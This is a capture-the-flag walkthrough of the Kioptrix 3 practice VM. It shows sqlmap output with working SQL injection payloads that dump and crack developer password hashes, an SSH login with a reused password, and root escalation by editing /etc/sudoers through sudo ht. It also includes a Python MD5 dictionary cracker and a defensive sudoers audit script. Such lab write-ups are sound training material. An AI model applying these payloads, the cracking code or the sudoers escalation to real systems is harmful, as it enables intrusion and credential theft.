[04:08:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[04:08:55] [INFO] fetching tables for database: 'gallery'
[04:08:55] [INFO] the SQL query used returns 7 entries
[04:08:56] [INFO] retrieved: dev_accounts
[04:08:56] [INFO] retrieved: gallarific_comments
[04:08:56] [INFO] retrieved: gallarific_galleries
[04:08:56] [INFO] retrieved: gallarific_photos
[04:08:56] [INFO] retrieved: gallarific_settings
[04:08:56] [INFO] retrieved: gallarific_stats
[04:08:56] [INFO] retrieved: gallarific_users
Database: gallery                                                                                  
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[04:08:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:08:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 04:08:56

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
[*] starting at 03:32:50

[03:32:50] [INFO] testing connection to the target URL
[03:32:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:32:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[03:32:51] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:32:51] [INFO] testing if the target URL is stable
[03:32:52] [INFO] target URL is stable
[03:32:52] [INFO] heuristics detected web page charset 'ascii'
[03:32:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:32:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[03:32:52] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:11] [WARNING] reflective value(s) found and filtering out
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[03:33:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[03:33:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[03:33:14] [INFO] testing 'MySQL inline queries'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:33:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:33:24] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[03:33:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:33:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:33:25] [INFO] target URL appears to be UNION injectable with 6 columns
[03:33:25] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[03:33:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:33:25] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[03:33:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:33:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:33:43] [INFO] fetching current database
[03:33:43] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] the SQL query used returns 3 entries                      
[03:33:43] [INFO] retrieved: id
[03:33:43] [INFO] retrieved: int(10)
[03:33:43] [INFO] retrieved: username
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] retrieved: password
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 2 entries
[03:33:44] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[03:33:44] [WARNING] automatically patching output having last char trimmed
[03:33:44] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[03:33:44] [INFO] analyzing table dump for possible password hashes          
[03:33:44] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[03:33:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt.gz
[03:34:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[03:34:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:34:26] [INFO] starting 2 processes
[03:34:27] [INFO] cracked password 'Mast3r' for user 'dreg'                  
[03:34:30] [INFO] cracked password 'starwars' for user 'loneferret'          
[03:34:31] [INFO] postprocessing table dump                                  
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

[03:34:31] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[03:34:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[03:34:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 03:34:31
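Two details of the run above are worth noting. The passwords are stored as unsalted MD5, so every candidate costs one hash and one dictionary lookup and the whole table is attacked at once; and the path typed at the "what dictionary" prompt was not taken (that prompt expects a menu number), so sqlmap reports "using default dictionary" and still cracked both with its built-in wordlist. The Python below is an added example, not code from the page or from sqlmap: a dictionary attack over a constructed stand-in wordlist, with simple capitalisation, leet and suffix mangling of the kind sqlmap's "common password suffixes" option applies (sqlmap's actual rule set is its own; the rules here are an assumption). It recovers the two hashes the page dumped.

```python
import hashlib

# Hashes as dumped from gallery.dev_accounts on the page (unsalted MD5).
DUMPED = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}

# Constructed stand-in for rockyou.txt; a real run streams the wordlist line by line.
WORDLIST = ["password", "123456", "starwars", "master", "letmein", "qwerty"]

# Mangling rules (assumed, not sqlmap's exact list): suffixes and single-letter
# leet substitutions applied to the word as typed, capitalised and upper-cased.
SUFFIXES = ["", "1", "123", "!", "2016"]
LEET = {"a": "4", "e": "3", "o": "0", "i": "1", "s": "5"}


def candidates(word):
    """Yield the mangled variants of one dictionary word."""
    bases = {word, word.capitalize(), word.upper()}
    for base in list(bases):
        for ch, repl in LEET.items():
            bases.add(base.replace(ch, repl))
    for base in sorted(bases):
        for suffix in SUFFIXES:
            yield base + suffix


def crack_md5(hashes, wordlist):
    """Dictionary attack: hash each candidate once, look it up against every target hash."""
    targets = {h.lower(): user for user, h in hashes.items()}
    cracked = {}
    for word in wordlist:
        for cand in candidates(word):
            user = targets.get(hashlib.md5(cand.encode()).hexdigest())
            if user and user not in cracked:
                cracked[user] = cand
            if len(cracked) == len(targets):
                return cracked
    return cracked


if __name__ == "__main__":
    for user, password in crack_md5(DUMPED, WORDLIST).items():
        print(user, password)
```

With a salted, slow hash (bcrypt, scrypt, PBKDF2) each guess would have to be recomputed per account and would cost milliseconds instead of microseconds; the instant result here is a property of the storage format as much as of the passwords.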

The dev_accounts passwords are reused for the system accounts, so loneferret's cracked password also works for SSH:

ssh loneferret@kioptrix3.com
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$

sudo su
[sudo] password for loneferret: 
Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3.

su is blocked for loneferret, but ht (the HT Editor) is allowed through sudo. An editor running as root can open and save any file on the box, so the su restriction buys nothing. ht is a curses program, so set a terminal type first:

export TERM=xterm
sudo ht

Opening /etc/shadow in ht shows root's md5crypt hash, which could be cracked offline, but there is a quicker route:
root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7::: 

Open /etc/sudoers in ht instead, add a line giving loneferret the same rights as root, and save:

loneferret@Kioptrix3:/usr/local/bin$ sudo ht /etc/sudoers

# User privilege specification
root    ALL=(ALL) ALL
loneferret ALL=(ALL) ALL

With that in place sudo su works:
loneferret@Kioptrix3:/usr/local/bin$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/usr/local/bin# whoami
root
root@Kioptrix3:/usr/local/bin#
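The lesson of this box is that a sudo rule which forbids su but permits an editor is not a restriction at all. The Python below is an added example, not code from the page: a small sudoers parser and audit that flags any rule granting a program able to read or write arbitrary files or spawn a shell as root. The sample sudoers text is constructed; the root line and the added loneferret line are as they appear above, while the earlier rule allowing ht and denying su is an assumption about what the original file on the VM looked like, written to show that a negated su entry does nothing once ht is allowed.

```python
import re

# Programs that read or write arbitrary files or spawn a shell when run as root.
# Any of these in a sudo rule is equivalent to granting root; ht is the one used here.
ROOT_EQUIVALENT = {
    "ht", "vi", "vim", "nano", "less", "more", "find", "awk",
    "python", "perl", "bash", "sh", "su", "tee", "cp", "dd",
}

# Constructed sudoers text (see lead-in). The last line is the assumed original rule.
SAMPLE_SUDOERS = """\
# /etc/sudoers
Defaults    env_reset

# User privilege specification
root    ALL=(ALL) ALL
loneferret ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/bin/su, /usr/local/bin/ht
"""

# user host=(runas) commands   (runas part optional, tags such as NOPASSWD: handled below)
RULE_RE = re.compile(
    r"^(?P<user>[^\s#]+)\s+(?P<host>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)


def parse_sudoers(text):
    """Parse user specification lines into dicts; comments, blanks and Defaults are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        cmds = []
        for cmd in m.group("cmds").split(","):
            cmd = re.sub(r"^(?:[A-Z]+:\s*)+", "", cmd.strip())  # drop NOPASSWD: etc.
            cmds.append(cmd)
        rules.append({
            "user": m.group("user"),
            "host": m.group("host"),
            "runas": m.group("runas") or "root",
            "cmds": cmds,
        })
    return rules


def root_equivalent_rules(text):
    """Return (user, command) pairs that hand the user root, ignoring negated entries."""
    findings = []
    for rule in parse_sudoers(text):
        for cmd in rule["cmds"]:
            if cmd.startswith("!"):
                continue  # a blacklist entry grants nothing, but removes nothing either
            program = cmd.split()[0].rsplit("/", 1)[-1]
            if cmd == "ALL" or program in ROOT_EQUIVALENT:
                findings.append((rule["user"], cmd))
    return findings


if __name__ == "__main__":
    for user, cmd in root_equivalent_rules(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} is root-equivalent")
```

On a real host the same check is run over the output of sudo -l for each account, which also expands aliases and included files that this parser does not handle.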


root@Kioptrix3:/usr/local/bin# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intended for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.


Best Regards,
Yuriy Stanchev/URIX